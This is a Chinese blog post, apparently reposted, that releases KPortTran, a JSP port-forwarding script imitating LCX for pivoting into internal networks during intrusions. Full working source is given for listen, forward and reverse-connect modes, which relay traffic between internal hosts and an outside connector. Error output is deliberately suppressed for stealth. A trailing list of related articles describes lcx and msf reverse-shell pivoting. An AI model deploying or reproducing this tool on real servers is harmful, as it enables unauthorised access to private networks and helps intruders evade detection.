最近接触内网很多,渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。

在这里发布出来,小伙伴们使用过程中,如果发现什么bug欢迎提交~

用法如下 KPortTran Usage:

参数

xxx.com/KPortTran.jsp? lip = local ip / 本地ip //一般为内网主机IP lp = local port / 本地端口 //一般为内网主机端口 rip = remote ip / 远程ip //一般为外网连接者IP,或者内网其他主机 rp = remote port / 远程端口 //一般为外网连接者端口 lp2 = local port2 / 本地端口2 //本地监听转发时的第二个端口 m = mode / 运行模式 //合法的值有:listen tran slave三种

运行模式

m = listen 需要参数:lp、lp2 该模式下,会在本地监听两个端口,相互转发数据 m = tran 需要参数:lip、lp、rip、rp 该模式为正向转发下,会在本地的lip上监听lp端口,当有连接建立时,再连接rip的rp端口。并将lip的lp上接收到的数据发向rip主机的rp端口。 m = slave 需要的参数: lip、lp、rip、rp 该模式为反向转发,会分别连接主机lip的lp端口 和 主机rip的rp端口。并转发两者数据,可用于内网反连。

注意事项: 某些server上使用时,可能由于编码问题会报错,请根据实际情况,更改代码首行的编码设置。 为了隐蔽,没有设置错误信息返回。如果不能执行,请检查一下参数。

测试截图: 

<%@page pageEncoding="GBK"%>

<%@page import="java.io.*"%>

<%@page import="java.util.*"%>

<%@page import="java.nio.charset.*"%>

<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>

<%@page import="java.net.*"%>

<%

/*code by KingX*/

class KPortTran {

	public void listen(String port1, String port2) {

		ServerSocket listenServerSocket = null;

		ServerSocket outServerSocket = null;

		try {

			listenServerSocket = new ServerSocket(Integer.parseInt(port1));

			outServerSocket = new ServerSocket(Integer.parseInt(port2));

		} catch (NumberFormatException e) {

		} catch (IOException e) {

		}

		Socket listenSocket = null;

		Socket outSocket = null;

		try {

			while (true) {

				listenSocket = listenServerSocket.accept();

				outSocket = outServerSocket.accept();

				new tranThread(outSocket, listenSocket).start();

				new tranThread(listenSocket, outSocket).start();

				Thread.sleep(200);

			}

		} catch (Exception e) {

	  }

	}

	public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {

		InetAddress src = InetAddress.getByName(srcIP);

		InetAddress dest = InetAddress.getByName(targetIP);

		int p1 = Integer.parseInt(port1);

		int p2 = Integer.parseInt(port2);

		new Server(src, p2, dest, p1, true);

	}

	public void tran(String srcIP, String port1, String targetIP, String port2)

			throws NumberFormatException, IOException {

		InetAddress src = InetAddress.getByName(srcIP);

		InetAddress dest = InetAddress.getByName(targetIP);

		int p1 = Integer.parseInt(port1);

		int p2 = Integer.parseInt(port2);

		new Server(src, p1, dest, p2, false);

	}

class tranThread extends Thread {

	Socket in;

	Socket out;

	InputStream is;

	OutputStream os;

	public tranThread(Socket in, Socket out) throws IOException {

		this.is = in.getInputStream();

		this.os = out.getOutputStream();

		this.in = in;

		this.out = out;

	}

	private void closeSocket() {

		try {

			is.close();

			os.close();

			in.close();

			out.close();

		} catch (IOException e) {

		}

	}

	@Override

	public void run() {

		super.run();

		byte[] buffer = new byte[4096];

		int len = -1;

		try {

			while (true) {

				if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {

					break;

				} else {

					os.write(buffer, 0, len);

					os.flush();

				}

			}

		} catch (IOException e) {

			closeSocket();

		} finally {

			closeSocket();

		}

	}

}

class Server extends Thread {

	InetAddress src;

	InetAddress dest;

	int p1, p2;

	boolean reverse = false;

	public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,

			int targetPort, boolean flag) {

		this.src = srcIP;

		this.dest = targetIP;

		this.p1 = srcPort;

		this.p2 = targetPort;

		this.reverse = flag;

		start();

	}

	@Override

	public void run() {

		super.run();

		if (reverse) {

			try {

				Socket s = new Socket(src, p1);

				Socket s2 = new Socket(dest, p2);

				new tranThread(s, s2).start();

				new tranThread(s2, s).start();

				while (true) {

					if (s2.isClosed() || s.isClosed()) {

						if (s2.isClosed()) {

							s2 = new Socket(dest, p2);

						}

						if (s.isClosed()) {

							s = new Socket(src, p1);

						}

						new tranThread(s, s2).start();

						new tranThread(s2, s).start();

					}

					Thread.sleep(1000);

				}

			} catch (IOException e) {

			} catch (InterruptedException e) {

			}

		} else {

			ServerSocket ss;

			try {

				ss = new ServerSocket(p1, 5, src);

				while (true) {

					Socket s = ss.accept();

					Socket s2 = new Socket(dest, p2);

					new tranThread(s, s2).start();

					new tranThread(s2, s).start();

				}

			} catch (IOException e) {

				e.printStackTrace();

			}

		}

	}

}

}

%>

<%

final String localIP = request.getParameter("lip");

final String localPort = request.getParameter("lp");

final String localPort2 = request.getParameter("lp2");

final String remoteIP =request.getParameter("rip");

final String remotePort =request.getParameter("rp");

final String mode =request.getParameter("m");

KPortTran pt = new KPortTran();

if (mode.equals("tran")) {

	pt.tran(localIP, localPort, remoteIP , remotePort);

}

if (mode.equals("slave")) {

	pt.slave(localIP, localPort, remoteIP , remotePort);

}

if (mode.equals("listen")) {

	pt.listen(localPort, localPort2);

}

%>

本文转载至,http://www.2cto.com/Article/201310/254016.html

JSP版LCX:端口转发神器 KPortTran的更多相关文章

  1. lcx端口转发 linux版

    一.端口转发使用 1.攻击机上执行以下命令 ./lcx -p1 -p2 -m 在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口 2.跳板机上执行以下命令 ./lcx -h ...

  2. vIDC v2.0 强大的端口转发神器使用总结-开放内网tfs代码服务

    vIDC2.0 端口映射工具,最近在公司闲来无事,想自己整个tfs来管理自己的研究代码. 本来是想用微软Visual Studio提供的免费tfs,但是无奈速度太慢.他们的服务器在美国,中国也没有代理 ...

  3. LCX端口转发实现内网突破

    工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是 ...

  4. lcx 端口转发

    1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStati ...

  5. lcx端口转发

    目录 0x01 正向端口转发 0x02 反向端口转发 0x03 msf正向shell 0x04 msf反向shell 注: 边界机器 win08 192.168.222.175 内网机器 win7 1 ...

  6. [内网渗透]lcx端口转发

    0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...

  7. linux下内网端口转发工具:linux版lcx [实现远程内网维护]

    这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...

  8. 端口转发 Port Forwarding (一)

    0x00First 最近发现一些好用的端口转发工具和技巧,计划认真梳理一下 SSH.NC.LCX.EW.FRP 0x01 SSH隧道端口转发 目前利用SSH隧道(SSH tunneling)进行端口转 ...

  9. 【转】实战 SSH 端口转发

    本文转自:http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html,至于有什么用,懂的懂! 实战 SSH 端口转发 通 ...

随机推荐

  1. 动态SQL(学习笔记)

    动态SQL EXECUTE IMMEDIATE 动态SQL字符串 [BUCK COLLECT] INTO 自定义的变量,,|记录类型 USING [IN |OUT|IN OUT]绑定的参数] [RET ...

  2. Java Web开发基础(3)-JSTL

    在DRP项目中接触到了JSTL标签库,对我这样的比較懒的人来说,第一感觉就是"惊艳". JSTL标签库的使用.能够消除大量复杂.繁复的工作.工作量降低的不是一点半点.是降低了一大半 ...

  3. [C++设计模式]template 模板方法模式

    模板法模式:定义一个操作中的算法骨架.而将一些步骤延迟到子类中. 依照<headfirst 设计模式>的样例.煮茶和煮咖啡的算法框架(流程)是一样的.仅仅是有些算法的实现是不一样的,有些是 ...

  4. Java 基础【12】 日期类型

    java api中日期类型的继承关系 java.lang.Object --java.util.Date --java.sql.Date --java.sql.Time --java.sql.Time ...

  5. maven POM.xml内的标签大全详解

    <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/20 ...

  6. Win10有效降低磁盘100%读写

    具体方法: 1.按下WIN+R调出运行,然后输入 regedit 回车; 2.在注册表编辑器中定位到:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet001\Se ...

  7. Maven学习笔记(二) :Maven的安装与配置

    在Windows上安装Maven:    1.  首先检查安装JDK 通过命令行运行命令:echo %JAVA_HOME%和 java  -version,能够查看当前java的安装文件夹及java的 ...

  8. java配置使用手册

    进行java开发,首先要安装jdk,安装了jdk后还要进行环境变量配置: 1.下载jdk(http://java.sun.com/javase/downloads/index.jsp),我下载的版本是 ...

  9. Swift和Objective-C混编的注意啦

    文/仁伯安(授权) 原文链接:http://www.jianshu.com/p/2ed48b954612 前言 Swift已推出数年,与Objective-C相比Swift的语言机制及使用简易程度上更 ...

  10. php 回收周期(Collecting Cycles)

    http://docs.php.net/manual/zh/features.gc.collecting-cycles.php 传统上,像以前的 php 用到的引用计数内存机制,无法处理循环的引用内存 ...